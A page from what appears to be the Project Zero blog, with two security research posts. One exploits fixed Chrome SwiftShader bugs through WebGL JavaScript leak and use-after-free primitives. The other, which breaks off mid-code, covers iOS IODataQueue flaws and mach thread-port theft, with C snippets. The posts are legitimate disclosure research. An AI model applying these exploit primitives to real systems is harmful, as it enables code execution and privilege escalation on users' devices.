Wednesday, October 24, 2018

Heap Feng Shader: Exploiting SwiftShader in Chrome

Posted by Mark Brand, Google Project Zero

On the majority of systems, under normal conditions, SwiftShader will never be used by Chrome - it’s used as a fallback if you have a known-bad “blacklisted” graphics card or driver. However, Chrome can also decide at runtime that your graphics driver is having issues, and switch to using SwiftShader to give a better user experience. If you’re interested to see the performance difference, or just to have a play, you can launch Chrome using SwiftShader instead of GPU acceleration using the --disable-gpu command line flag.

SwiftShader is quite an interesting attack surface in Chrome, since all of the rendering work is done in a separate process: the GPU process. Since this process is responsible for drawing to the screen, it needs to have more privileges than the highly-sandboxed renderer processes that are usually handling webpage content. On typical Linux desktop system configurations, technical limitations in sandboxing access to the X11 server mean that this sandbox is very weak; on other platforms such as Windows, the GPU process still has access to a significantly larger kernel attack surface. Can we write an exploit that gets code execution in the GPU process without first compromising a renderer? We’ll look at exploiting two issues that we reported and which were recently fixed by Chrome.

It turns out that if you have a supported GPU, it’s still relatively straightforward for an attacker to force your browser to use SwiftShader for accelerated graphics - if the GPU process crashes more than 4 times, Chrome will fall back to this software rendering path instead of disabling acceleration. In my testing it’s quite simple to cause the GPU process to crash or hit an out-of-memory condition from WebGL - this is left as an exercise for the interested reader. For the rest of this blog-post we’ll be assuming that the GPU process is already in the fallback software rendering mode.

Previous precision problems


We previously discussed an information leak issue resulting from some precision issues in the SwiftShader code, so we’ll start here, with a useful leaking primitive from that issue. A little bit of playing around brought me to the following result, which will allocate a texture of size 0xb620000 in the GPU process, and when the function read() is called on it will return the 0x10000 bytes directly following that buffer back to javascript. (The allocation happens at the glTexImage2D call, and the out-of-bounds access happens at the blitFramebuffer call marked by the trigger comment.)

function issue_1584(gl) {
 const src_width  = 0x2000;
 const src_height = 0x16c4;

 // we use a texture for the source, since this will be allocated directly
 // when we call glTexImage2D.

 this.src_fb = gl.createFramebuffer();
 gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

 let src_data = new Uint8Array(src_width * src_height * 4);
 for (var i = 0; i < src_data.length; ++i) {
   src_data[i] = 0x41;
 }

 let src_tex = gl.createTexture();
 gl.bindTexture(gl.TEXTURE_2D, src_tex);
 gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_width, src_height, 0, gl.RGBA, gl.UNSIGNED_BYTE, src_data);
 gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
 gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
 gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, src_tex, 0);

 this.read = function() {
   gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

   const dst_width  = 0x2000;
   const dst_height = 0x1fc4;

    let dst_fb = gl.createFramebuffer();
   gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

   let dst_rb = gl.createRenderbuffer();
   gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);
   gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_width, dst_height);
   gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, dst_rb);

   gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

   // trigger
   gl.blitFramebuffer(0, 0, src_width, src_height,
                      0, 0, dst_width, dst_height,
                      gl.COLOR_BUFFER_BIT, gl.NEAREST);

   // copy the out of bounds data back to javascript
   var leak_data = new Uint8Array(dst_width * 8);
   gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);
   gl.readPixels(0, dst_height - 1, dst_width, 1, gl.RGBA, gl.UNSIGNED_BYTE, leak_data);
   return leak_data.buffer;
 }

 return this;
}

This might seem like quite a crude leak primitive, but since SwiftShader is using the system heap, it’s quite easy to arrange for the memory directly following this allocation to be accessible safely.

And a second bug


Now, the next vulnerability we have is a use-after-free of an egl::ImageImplementation object caused by a reference count overflow. This object is quite a nice object from an exploitation perspective, since from javascript we can read and write from the data it stores, so it seems like the nicest exploitation approach would be to replace this object with a corrupted version; however, as it’s a C++ object we’ll need to break ASLR in the GPU process to achieve this. If you’re reading along in the exploit code, the function leak_image in feng_shader.html implements a crude spray of egl::ImageImplementation objects and uses the information leak above to find an object to copy.

So - a stock-take. We’ve just freed an object, and we know exactly what the data that *should* be in that object looks like. This seems straightforward - now we just need to find a primitive that will allow us to replace it!

This was actually the most frustrating part of the exploit. Due to the multiple levels of validation/duplication/copying that occur when OpenGL commands are passed from WebGL to the GPU process (Initial WebGL validation (in renderer), GPU command buffer interface, ANGLE validation), getting a single allocation of a controlled size with controlled data is non-trivial! The majority of allocations that you’d expect to be useful (image/texture data etc.) end up having lots of size restrictions or being rounded to different sizes.

However, there is one nice primitive for doing this - shader uniforms. This is the way in which parameters are passed to programmable GPU shaders; and if we look in the SwiftShader code we can see that (eventually) when these are allocated they will do a direct call to operator new[]. We can read and write from the data stored in a uniform, so this will give us the primitive that we need.

The code below implements this technique for (very basic) heap grooming in the SwiftShader/GPU process, and an optimised method for overflowing the reference count. The shader source code (passed to gl.shaderSource below) will cause 4 allocations of size 0xf0 when the program object is linked; the original object is freed at the final copyTexImage2D call and replaced by a shader uniform object when gl.linkProgram is called.

function issue_1585(gl, fake) {
 let vertex_shader = gl.createShader(gl.VERTEX_SHADER);
 gl.shaderSource(vertex_shader, `
   attribute vec4 position;
   uniform int block0[60];
   uniform int block1[60];
   uniform int block2[60];
   uniform int block3[60];

   void main() {
     gl_Position = position;
     gl_Position.x += float(block0[0]);
     gl_Position.x += float(block1[0]);
     gl_Position.x += float(block2[0]);
     gl_Position.x += float(block3[0]);
   }`);
 gl.compileShader(vertex_shader);

 let fragment_shader = gl.createShader(gl.FRAGMENT_SHADER);
 gl.shaderSource(fragment_shader, `
   void main() {
     gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);
   }`);
 gl.compileShader(fragment_shader);

 this.program = gl.createProgram();
 gl.attachShader(this.program, vertex_shader);
 gl.attachShader(this.program, fragment_shader);

 const uaf_width = 8190;
 const uaf_height = 8190;

 this.fb = gl.createFramebuffer();
 let uaf_rb = gl.createRenderbuffer();

 gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.fb);
 gl.bindRenderbuffer(gl.RENDERBUFFER, uaf_rb);
 gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, uaf_width, uaf_height);
 gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, uaf_rb);

 let tex = gl.createTexture();
 gl.bindTexture(gl.TEXTURE_CUBE_MAP, tex);
 // trigger
 for (let i = 2; i < 0x10; ++i) {
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
 }

 function unroll(gl) {
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
   // snip ...
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
 }

 for (let i = 0x10; i < 0x100000000; i += 0x10) {
   unroll(gl);
 }

 // the reference count of the egl::ImageImplementation backing uaf_rb has now
 // wrapped to 0, so this call will free it, leaving a dangling reference
 gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 256, 256, 0);

 // replace the allocation with our shader uniform.
 gl.linkProgram(this.program);
 gl.useProgram(this.program);

 function wait(ms) {
   var start = Date.now(),
   now = start;
   while (now - start < ms) {
     now = Date.now();
   }
 }

 function read(uaf, index) {
   wait(200);
   var read_data = new Int32Array(60);
   for (var i = 0; i < 60; ++i) {
     read_data[i] = gl.getUniform(uaf.program, gl.getUniformLocation(uaf.program, 'block' + index.toString() + '[' + i.toString() + ']'));
   }
   return read_data.buffer;
 }

 function write(uaf, index, buffer) {
   gl.uniform1iv(gl.getUniformLocation(uaf.program, 'block' + index.toString()), new Int32Array(buffer));
   wait(200);
 }

 this.read = function() {
   return read(this, this.index);
 }

 this.write = function(buffer) {
   return write(this, this.index, buffer);
 }

 for (var i = 0; i < 4; ++i) {
   write(this, i, fake.buffer);
 }

 gl.readPixels(0, 0, 2, 2, gl.RGBA_INTEGER, gl.UNSIGNED_INT, new Uint32Array(2 * 2 * 16));
 for (var i = 0; i < 4; ++i) {
   data = new DataView(read(this, i));
   for (var j = 0; j < 0xf0; ++j) {
     if (fake.getUint8(j) != data.getUint8(j)) {
       log('uaf block index is ' + i.toString());
       this.index = i;
       return this;
     }
   }
 }
}

At this point we can modify the object to allow us to read and write from all of the GPU process’ memory; see the read_write function for how the gl.readPixels and gl.blitFramebuffer methods are used for this.

Now, it should be fairly trivial to get arbitrary code execution from this point; although it’s often a pain to get your ROP chain to line up nicely when you have to replace a C++ object, this is a very tractable problem. It turns out, though, that there’s another trick that will make this exploit more elegant.

SwiftShader uses JIT compilation of shaders to get as high performance as possible - and that JIT compiler uses another C++ object to handle loading and mapping the generated ELF executables into memory. Maybe we can build a fake object that lets the GPU process treat our egl::ImageImplementation object as a SubzeroReactor::ELFMemoryStreamer object, and have the GPU process load an ELF file for us as a payload, instead of fiddling around ourselves?

We can - so we create a fake vtable such that:
egl::ImageImplementation::lockInternal -> egl::ImageImplementation::lockInternal
egl::ImageImplementation::unlockInternal -> ELFMemoryStreamer::getEntry
egl::ImageImplementation::release -> shellcode

When we then read from this image object, instead of returning pixels to javascript, we’ll execute our shellcode payload in the GPU process.
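
To make the layout concrete, here’s a minimal sketch in C (not the exploit’s actual code) of how such a fake object can be modelled: the first pointer-sized field of the replacement object points at a fake vtable, which is just an array of function pointers. The 0xf0 object size comes from the discussion above, but the slot ordering and field layout shown here are assumptions for illustration.

#include <stdint.h>

// hypothetical signature for the virtual calls we care about
typedef void (*virtual_fn)(void *self);

// illustrative vtable layout - the real slot ordering isn't shown in this post
struct fake_vtable {
    virtual_fn lockInternal;    // -> the real egl::ImageImplementation::lockInternal
    virtual_fn unlockInternal;  // -> ELFMemoryStreamer::getEntry
    virtual_fn release;         // -> shellcode
};

// the 0xf0-byte replacement object written into the freed allocation via the
// shader uniform write primitive
struct fake_image {
    struct fake_vtable *vtable;                          // first field of a C++ object with virtuals
    uint8_t body[0xf0 - sizeof(struct fake_vtable *)];   // remaining fields, copied from the leak
};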

Conclusions

It’s interesting that we can find directly javascript-accessible attack surface in some unlikely places in a modern browser codebase when we look at things sideways - avoiding the perhaps more obvious and highly contested areas such as the main javascript JIT engine.

In many codebases, there is a long history of development and there are many trade-offs made for compatibility and consistency across releases. It’s worth reviewing some of these to see whether the original expectations turned out to be valid after the release of these features, and if they still hold today, or if these features can actually be removed without significant impact to users.

Thursday, October 18, 2018

Deja-XNU

Posted by Ian Beer, Google Project Zero

This blog post revisits an old bug found by Pangu Team and combines it with a new, albeit very similar issue I recently found to try to build a "perfect" exploit for iOS 7.1.2.

State of the art
An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.

So let's turn back the clock to 2014...

Pangu 7
On June 23 2014 @PanguTeam released the Pangu 7 jailbreak for iOS 7.1-7.1.x. They exploited a lot of bugs. The issue we're interested in is CVE-2014-4461 which Apple described as: A validation issue ... in the handling of certain metadata fields of IOSharedDataQueue objects. This issue was addressed through relocation of the metadata.

(Note that this kernel bug wasn't actually fixed in iOS 8 and Pangu reused it for Pangu 8...)

Queuerious...
Looking at the iOS 8-era release notes you'll see that Pangu and I had found some bugs in similar areas:

  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.

CVE-2014-4418 : Ian Beer of Google Project Zero

  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.

CVE-2014-4388 : @PanguTeam

  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved validation of IOKit API arguments.

CVE-2014-4389 : Ian Beer of Google Project Zero

IODataQueue
I had looked at the IOKit class IODataQueue, which the header file IODataQueue.h tells us "is designed to allow kernel code to queue data to a user process." It does this by creating a lock-free queue data-structure in shared memory.

IODataQueue was quite simple; there were only two fields: dataQueue and notifyMsg:

class IODataQueue : public OSObject
{
 OSDeclareDefaultStructors(IODataQueue)
protected:
 IODataQueueMemory * dataQueue;
 void * notifyMsg;
public:
 static IODataQueue *withCapacity(UInt32 size);
 static IODataQueue *withEntries(UInt32 numEntries, UInt32 entrySize);
 virtual Boolean initWithCapacity(UInt32 size);
 virtual Boolean initWithEntries(UInt32 numEntries, UInt32 entrySize);
 virtual Boolean enqueue(void *data, UInt32 dataSize);
 virtual void setNotificationPort(mach_port_t port);
 virtual IOMemoryDescriptor *getMemoryDescriptor();
};

Here's the entire implementation of IODataQueue, as it was around iOS 7.1.2:

OSDefineMetaClassAndStructors(IODataQueue, OSObject)

IODataQueue *IODataQueue::withCapacity(UInt32 size)
{
   IODataQueue *dataQueue = new IODataQueue;

   if (dataQueue) {
       if (!dataQueue->initWithCapacity(size)) {
           dataQueue->release();
           dataQueue = 0;
       }
   }

   return dataQueue;
}

IODataQueue *IODataQueue::withEntries(UInt32 numEntries, UInt32 entrySize)
{
   IODataQueue *dataQueue = new IODataQueue;

   if (dataQueue) {
       if (!dataQueue->initWithEntries(numEntries, entrySize)) {
           dataQueue->release();
           dataQueue = 0;
       }
   }

   return dataQueue;
}

Boolean IODataQueue::initWithCapacity(UInt32 size)
{
   vm_size_t allocSize = 0;

   if (!super::init()) {
       return false;
   }

   allocSize = round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE);

   if (allocSize < size) {
       return false;
   }

   dataQueue = (IODataQueueMemory *)IOMallocAligned(allocSize, PAGE_SIZE);
   if (dataQueue == 0) {
       return false;
   }

   dataQueue->queueSize    = size;
   dataQueue->head         = 0;
   dataQueue->tail         = 0;

   return true;
}

Boolean IODataQueue::initWithEntries(UInt32 numEntries, UInt32 entrySize)
{
   return (initWithCapacity((numEntries + 1) * (DATA_QUEUE_ENTRY_HEADER_SIZE + entrySize)));
}

void IODataQueue::free()
{
   if (dataQueue) {
       IOFreeAligned(dataQueue, round_page(dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE));
   }

   super::free();

   return;
}

Boolean IODataQueue::enqueue(void * data, UInt32 dataSize)
{
   const UInt32       head = dataQueue->head;  // volatile
   const UInt32       tail = dataQueue->tail;
   const UInt32       entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;
   IODataQueueEntry * entry;

   if ( tail >= head )
   {
       // Is there enough room at the end for the entry?
       if ( (tail + entrySize) <= dataQueue->queueSize )
       {
           entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);

           entry->size = dataSize;
           memcpy(&entry->data, data, dataSize);

           // The tail can be out of bound when the size of the new entry
           // exactly matches the available space at the end of the queue.
           // The tail can range from 0 to dataQueue->queueSize inclusive.

           dataQueue->tail += entrySize;
       }
       else if ( head > entrySize ) // Is there enough room at the beginning?
       {
           // Wrap around to the beginning, but do not allow the tail to catch
           // up to the head.

           dataQueue->queue->size = dataSize;

           // We need to make sure that there is enough room to set the size before
           // doing this. The user client checks for this and will look for the size
           // at the beginning if there isn't room for it at the end.

           if ( ( dataQueue->queueSize - tail ) >= DATA_QUEUE_ENTRY_HEADER_SIZE )
           {
               ((IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail))->size = dataSize;
           }

           memcpy(&dataQueue->queue->data, data, dataSize);
           dataQueue->tail = entrySize;
       }
       else
       {
           return false; // queue is full
       }
   }
   else
   {
       // Do not allow the tail to catch up to the head when the queue is full.
       // That's why the comparison uses a '>' rather than '>='.

       if ( (head - tail) > entrySize )
       {
           entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);

           entry->size = dataSize;
           memcpy(&entry->data, data, dataSize);
           dataQueue->tail += entrySize;
       }
       else
       {
           return false; // queue is full
       }
   }

   // Send notification (via mach message) that data is available.

   if ( ( head == tail )                /* queue was empty prior to enqueue() */
   || ( dataQueue->head == tail ) )   /* queue was emptied during enqueue() */
   {
       sendDataAvailableNotification();
   }

   return true;
}

void IODataQueue::setNotificationPort(mach_port_t port)
{
   static struct _notifyMsg init_msg = { {
       MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0),
       sizeof (struct _notifyMsg),
       MACH_PORT_NULL,
       MACH_PORT_NULL,
       0,
       0
   } };

   if (notifyMsg == 0) {
       notifyMsg = IOMalloc(sizeof(struct _notifyMsg));
   }

   *((struct _notifyMsg *)notifyMsg) = init_msg;

   ((struct _notifyMsg *)notifyMsg)->h.msgh_remote_port = port;
}

void IODataQueue::sendDataAvailableNotification()
{
   kern_return_t kr;
   mach_msg_header_t * msgh;

   msgh = (mach_msg_header_t *)notifyMsg;
   if (msgh && msgh->msgh_remote_port) {
       kr = mach_msg_send_from_kernel_proper(msgh, msgh->msgh_size);
       switch(kr) {
           case MACH_SEND_TIMED_OUT: // Notification already sent
           case MACH_MSG_SUCCESS:
               break;
           default:
               IOLog("%s: dataAvailableNotification failed - msg_send returned: %d\n", /*getName()*/"IODataQueue", kr);
               break;
       }
   }
}

IOMemoryDescriptor *IODataQueue::getMemoryDescriptor()
{
   IOMemoryDescriptor *descriptor = 0;

   if (dataQueue != 0) {
       descriptor = IOMemoryDescriptor::withAddress(dataQueue, dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE, kIODirectionOutIn);
   }

   return descriptor;
}

The ::initWithCapacity method allocates the buffer which will end up in shared memory. We can see from the cast that the structure of the memory looks like this:

typedef struct _IODataQueueMemory {
   UInt32            queueSize;
   volatile UInt32   head;
   volatile UInt32   tail;
   IODataQueueEntry  queue[1];
} IODataQueueMemory;

The ::setNotificationPort method allocated a mach message header structure via IOMalloc when it was first called and stored the buffer as notifyMsg.

The ::enqueue method was responsible for writing data into the next free slot in the queue, potentially wrapping back around to the beginning of the buffer.

Finally, ::getMemoryDescriptor created an IOMemoryDescriptor object which wrapped the dataQueue memory to return to userspace.

IODataQueue.cpp was 243 lines, including license and comments. I count at least 6 bugs in the code above. There’s only one integer overflow check, but there are multiple obvious integer overflow issues. The other problems stemmed from the fact that the only place the IODataQueue stored the queue’s length was in the shared memory which userspace could modify.

This led to obvious memory corruption issues in ::enqueue, since userspace could alter the queueSize, head and tail fields and the kernel had no way to verify whether they were within the bounds of the queue buffer. The other two uses of the queueSize field also yielded interesting bugs: the ::free method has to trust the queueSize field, and so will make an oversized IOFree. Most interesting of all, however, is ::getMemoryDescriptor, which trusts queueSize when creating the IOMemoryDescriptor. If the kernel code which was using the IODataQueue allowed userspace to get multiple memory descriptors this would have let us get an oversized memory descriptor, potentially giving us read/write access to other kernel heap objects.
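
As a concrete illustration of the integer overflow issues mentioned above, here’s a minimal sketch of the arithmetic performed by ::initWithEntries. The entry header size is assumed to be 4 bytes (just the size field of an IODataQueueEntry) purely for illustration; the point is that the 32-bit multiplication can wrap, so the capacity passed on to ::initWithCapacity is far smaller than the queue the caller asked for.

#include <stdint.h>
#include <stdio.h>

#define DATA_QUEUE_ENTRY_HEADER_SIZE 4u  // assumed value, for illustration only

int main(void) {
    uint32_t numEntries = 0x10000;  // attacker-chosen
    uint32_t entrySize  = 0xfffc;   // attacker-chosen

    // (0x10000 + 1) * (4 + 0xfffc) == 0x100010000, which truncates to 0x10000
    uint32_t capacity = (numEntries + 1) * (DATA_QUEUE_ENTRY_HEADER_SIZE + entrySize);

    printf("requested %u entries of %u bytes, computed capacity: 0x%x\n",
           (unsigned)numEntries, (unsigned)entrySize, (unsigned)capacity);
    return 0;
}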

Back to Pangu
Pangu's kernel code exec bug isn't in IODataQueue but in the subclass IOSharedDataQueue. IOSharedDataQueue.h tells us that the "IOSharedDataQueue class is designed to also allow a user process to queue data to kernel code."

IOSharedDataQueue adds one (unused) field:

   struct ExpansionData {
   };
   /*! @var reserved
       Reserved for future use.  (Internal use only) */
   ExpansionData * _reserved;


IOSharedDataQueue doesn't override the ::enqueue method, but adds a ::dequeue method to allow the kernel to dequeue objects which userspace has enqueued.

::dequeue had the same problems as ::enqueue with the queue size being in shared memory, which could lead the kernel to read out of bounds. But strangely that wasn't the only change in IOSharedDataQueue. Pangu noticed that IOSharedDataQueue also had a much more curious change in its overridden version of ::initWithCapacity:

Boolean IOSharedDataQueue::initWithCapacity(UInt32 size)
{
   IODataQueueAppendix *   appendix;
   
   if (!super::init()) {
       return false;
   }
   
   dataQueue = (IODataQueueMemory *)IOMallocAligned(round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE + DATA_QUEUE_MEMORY_APPENDIX_SIZE), PAGE_SIZE);
   if (dataQueue == 0) {
       return false;
   }

   dataQueue->queueSize = size;
   dataQueue->head = 0;
   dataQueue->tail = 0;
   
   appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + size + DATA_QUEUE_MEMORY_HEADER_SIZE);
   appendix->version = 0;
   notifyMsg = &(appendix->msgh);
   setNotificationPort(MACH_PORT_NULL);

   return true;
}

IOSharedDataQueue increased the size of the shared memory buffer to also add space for an IODataQueueAppendix structure:

typedef struct _IODataQueueAppendix {
   UInt32 version;
   mach_msg_header_t msgh;
} IODataQueueAppendix;

This contains a version field and, strangely, a mach message header. Then on this line:

 notifyMsg = &(appendix->msgh);

the notifyMsg member of the IODataQueue superclass is set to point in to that appendix structure.

Recall that IODataQueue allocated a mach message header structure via IOMalloc when a notification port was first set, so why did IOSharedDataQueue do it differently? About the only plausible explanation I can come up with is that a developer had noticed that the dataQueue memory allocation typically wasted almost a page of memory, because clients asked for a page-multiple number of bytes, then the queue allocation added a small header to that and rounded up to a page-multiple again. This change allowed you to save a single 0x18 byte kernel allocation per queue. Given that this change seems to have landed right around the launch date of the first iPhone, a memory constrained device with no swap, I could imagine there was a big drive to save memory.

But the question is: can you put a mach message header in shared memory like that?

What's in a message?
Here's the definition of mach_msg_header_t, as it was in iOS 7.1.2:

typedef struct
{
 mach_msg_bits_t  msgh_bits;
 mach_msg_size_t  msgh_size;
 mach_port_t      msgh_remote_port;
 mach_port_t      msgh_local_port;
 mach_msg_size_t  msgh_reserved;
 mach_msg_id_t    msgh_id;
} mach_msg_header_t;

(The msgh_reserved field has since become msgh_voucher_port with the introduction of vouchers.)

Both userspace and the kernel appear at first glance to have the same definition of this structure, but upon closer inspection if you resolve all the typedefs you'll see this very important distinction:

userspace:
typedef __darwin_mach_port_t mach_port_t;
typedef __darwin_mach_port_name_t __darwin_mach_port_t;
typedef __darwin_natural_t __darwin_mach_port_name_t;
typedef unsigned int __darwin_natural_t;

kernel:
typedef ipc_port_t mach_port_t;
typedef struct ipc_port *ipc_port_t;

In userspace mach_port_t is an unsigned 32-bit integer which is a task-local name for a port, but in the kernel a mach_port_t is a raw pointer to the underlying ipc_port structure.

Since the kernel is the one responsible for initializing the notification message, and is the one sending it, it seems that the kernel is writing kernel pointers into userspace shared memory!

Fast-forward
Before we move on to writing a new exploit for that old issue let's jump forward to 2018, and why exactly I'm looking at this old code again.

I've recently spoken publicly about the importance of variant analysis, and I thought it was important to actually do some variant analysis myself before I gave that talk. By variant analysis, I mean taking a known security bug and looking for code which is vulnerable in a similar way. That could mean searching a codebase for all uses of a particular API which has exploitable edge cases, or even just searching for a buggy code snippet which has been copy/pasted into a different file.

Userspace queues and deja-xnu
This summer while looking for variants of the old IODataQueue issues I saw something I hadn't noticed before: as well as the facilities for enqueuing and dequeuing objects to and from kernel-owned IODataQueues, the userspace IOKit.framework also contains code for creating userspace-owned queues, for use only between userspace processes.

The code for creating these queues isn't in the open-source IOKitUser package; you can only see this functionality by reversing the IOKit framework binary.

There are no users of this code in the IOKitUser source, but some reversing showed that the userspace-only queues were used by the com.apple.iohideventsystem MIG service, implemented in IOKit.framework and hosted by backboardd on iOS and hidd on macOS. You can talk to this service from inside the app sandbox on iOS.

Reading the userspace __IODataQueueEnqueue method, which is used to enqueue objects into both userspace and kernel queues, I had a strong feeling of deja-xnu: It was trusting the queueSize value in the queue header in shared memory, just like CVE-2014-4418 from 2014 did. Of course, if the kernel is the other end of the queue then this isn't interesting (since the kernel doesn't trust these values) but we now know that there are userspace only queues, where the other end is another userspace process.

Reading more of the userspace IODataQueue handling code I noticed that, unlike the kernel IODataQueue object, the userspace one had an appendix as well as a header. And in that appendix, like IOSharedDataQueue, it stored a mach message header! Did this userspace IODataQueue have the same issue as the IOSharedDataQueue issue from Pangu 7/8? Let's look at the code:

IOReturn IODataQueueSetNotificationPort(IODataQueueMemory *dataQueue, mach_port_t notifyPort)
{
   IODataQueueAppendix * appendix = NULL;
   UInt32 queueSize = 0;
           
   if ( !dataQueue )
       return kIOReturnBadArgument;
       
   queueSize = dataQueue->queueSize;
   
   appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE);

   appendix->msgh.msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
   appendix->msgh.msgh_size        = sizeof(appendix->msgh);
   appendix->msgh.msgh_remote_port = notifyPort;
   appendix->msgh.msgh_local_port  = MACH_PORT_NULL;
   appendix->msgh.msgh_id          = 0;

   return kIOReturnSuccess;
}

We can take a look in lldb at the contents of the buffer and see that at the end of the queue, still in shared memory, we can see a mach message header, where the name field is the remote end's name for the notification port we provided!

Exploitation of an arbitrary mach message send
In XNU each task (process) has a task port, and each thread within a task has a thread port. Originally a send right to a task's task port gave full memory and thread control, and a send right to a thread port meant full thread control (which is of course also full memory control.)

As a result of the exploits which I and others have released abusing issues with mach ports to steal port rights Apple have very slowly been hardening these interfaces. But as of iOS 11.4.1 if you have a send right to a thread port belonging to another task you can still use it to manipulate the register state of that thread.
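
As a rough sketch of what that control looks like (32-bit ARM state shown for simplicity; on arm64 the flavor and field names differ, and the helper name here is mine), a stolen thread port can be used like this:

#include <mach/mach.h>

// redirect a thread in another task using only a send right to its thread port
static kern_return_t set_thread_pc(thread_act_t thread, uint32_t new_pc) {
    arm_thread_state_t state;
    mach_msg_type_number_t count = ARM_THREAD_STATE_COUNT;

    kern_return_t kr = thread_get_state(thread, ARM_THREAD_STATE,
                                        (thread_state_t)&state, &count);
    if (kr != KERN_SUCCESS)
        return kr;

    state.__pc = new_pc;  // point the thread at code of our choosing
    return thread_set_state(thread, ARM_THREAD_STATE,
                            (thread_state_t)&state, ARM_THREAD_STATE_COUNT);
}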

Interestingly, process startup on iOS is sufficiently deterministic that in backboardd, from iOS 7.1.2 on an iPhone 4 right up to iOS 11.4.1 on an iPhone SE, 0x407 names a thread port.

Stealing ports
The msgh_local_port field in a mach message is typically used to give the recipient of a message a send-once right to a "reply port" which can be used to send a reply. This is just a convention and any send or send-once right can be transferred here. So by rewriting the mach message in shared memory which will be sent to us to set the msgh_local_port field to 0x407 (backboardd's name for a thread port) and the msgh_bits field to use a COPY_SEND disposition for the local port, when the notification message is sent to us by backboardd we'll receive a send right to a backboardd thread port!
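
A minimal sketch of that rewrite (the helper name is mine, and shm_msg is assumed to point at the notification message header in the queue's shared memory):

#include <mach/mach.h>

// rewrite the shared-memory notification message so that when backboardd sends
// it, a copy of the send right named 0x407 (a backboardd thread port) is
// transferred to us as the message's local port
static void steal_thread_port(mach_msg_header_t *shm_msg) {
    shm_msg->msgh_local_port = 0x407;
    shm_msg->msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND,   // remote port
                                        MACH_MSG_TYPE_COPY_SEND);  // local port
}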

The exploit for this issue targets iOS 11.4.1, and contains a modified version of the remote_call code from triple_fetch to work with a stolen thread port rather than a task port.

Back to 2014
I mentioned that Apple have slowly been adding mitigations against the use of stolen task ports. The first of these mitigations I'm aware of was to prevent userspace using the kernel task port, often known as task-for-pid-0 or TFP0, which is the task port representing the kernel task (and hence allowing read/write access to kernel memory). I believe this was done in response to my mach_portal exploit which used a kernel use-after-free to steal a send right to the kernel task port.

Prior to that hardening, if you had a send right to the kernel task port you had complete read/write access to kernel memory.

We've seen that port name allocation is extremely stable, with the same name for a thread port for four years. Is the situation similar for the ipc_port pointers used in the kernel in mach messages?

Very early kernel port allocation is also deterministic. I abused this in mach_portal to steal the kernel task port by first determining the address of the host port then guessing that the kernel task port must be nearby since they're both very early port allocations.

Back in 2014 things were even easier because the kernel task port was at a fixed offset from the host port; all we need to do is leak the address of the host port then we can compute the address of the kernel task port!

Determining port addresses
IOHIDEventService is a userclient which exposes an IOSharedDataQueue to userspace. We can't open this from inside the app sandbox, but the exploit for the userspace IODataQueue bug was easy enough to backport to 32-bit iOS 7.1.2, and we can open an IOHIDEventService userclient from backboardd.

The sandbox only prevents us from actually opening the userclient connection. We can then transfer the mach port representing this connection back to our sandboxed app and continue the exploit from there. Using the code I wrote for triple_fetch we can easily use backboardd's task port which we stole (using the userspace IODataQueue bug) to open an IOKit userclient connection and move it back:

uint32_t remote_matching =
 task_remote_call(bbd_task_port,
                  IOServiceMatching,
                  1,
